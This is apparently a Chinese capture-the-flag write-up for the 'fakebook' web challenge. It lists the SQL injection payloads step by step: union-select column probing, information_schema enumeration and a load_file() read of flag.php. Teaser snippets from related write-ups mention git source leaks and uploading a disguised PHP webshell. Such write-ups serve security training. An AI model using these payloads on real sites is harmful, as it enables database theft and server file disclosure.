根據提示註冊乙個使用者,blog的位置需要輸入一段**才能通過註冊。註冊成功以後可以檢視使用者資訊。
通過?no=1 and 1=1
和?no=1 and 1=2
可以驗證存在sql注入漏洞,接下來嘗試注入。
使用?no=1 union/**/select 1,2,3,4
可以判斷該表中存在4個字段
使用?no=1 and 0 union/**/select 1,2,3,4
可以判斷有回顯的字段是第二個
使用?no=1 and 0 union/**/select 1,database(),3,4
可以查出當前資料庫是fakebook
使用?no=1 and 0 union/**/select 1,user(),3,4
顯示當前使用者是root@localhost
使用?no=1 and 0 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'
查到當前資料庫中有乙個users表
使用?no=1 and 0 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' and table_name='users'
查出users表中有no,username,passwd,data
這幾個字段
這道題的flag沒有明說在哪個位置,但是通過掃瞄發現有乙個flag.php的頁面,所以接下來就需要讀取這個頁面的內容。配合剛剛注入時發現的mysql使用者是root,這就可以嘗試使用sql中的load_file()函式來讀取檔案,payload如下:
?no=0 union/**/select 1,load_file("/var/www/html/flag.php"),3,4
在瀏覽器裡可以檢視到flag:
攻防世界mfw 攻防世界 Web mfw
題目資訊 image.png 工具 githack,dirsearch 知識點 git漏洞 審計 開啟題目場景,檢查 發現這樣乙個頁面 image.png 訪問.git目錄,疑似存在git原始碼洩露 image.png 再用dirsearch掃瞄,發現git原始碼洩露 使用 githack獲取原始碼...
攻防世界Web lottery
開心!雖然第一次遇到git原始碼洩露寫了好久,但是寫出來了就很開心 開啟介面我們知道,要拿到flag,就要贏到足夠的錢,其實一開始我以為可以找到乙個地方直接修改餘額什麼的,把網頁源 中的檔案看了幾個都沒發現突破口 然後又沒思路了 嘗試了一下robots.txt,想看看有沒有什麼檔案,然後發現了 瞬間...
攻防世界 xctf Guess writeup
本題的解析官網上有,這裡是乙個自動化的指令碼,完成的是自動上傳乙個ant.jpg的檔案 ant.jpg是乙個ant.zip壓縮包重新命名的檔案,裡面是乙個ant.php的一句話木馬 執行返回的是在web後台這個檔案重新命名後的檔案的url。可通過zip偽協議訪問這個木馬。指令碼如下 import r...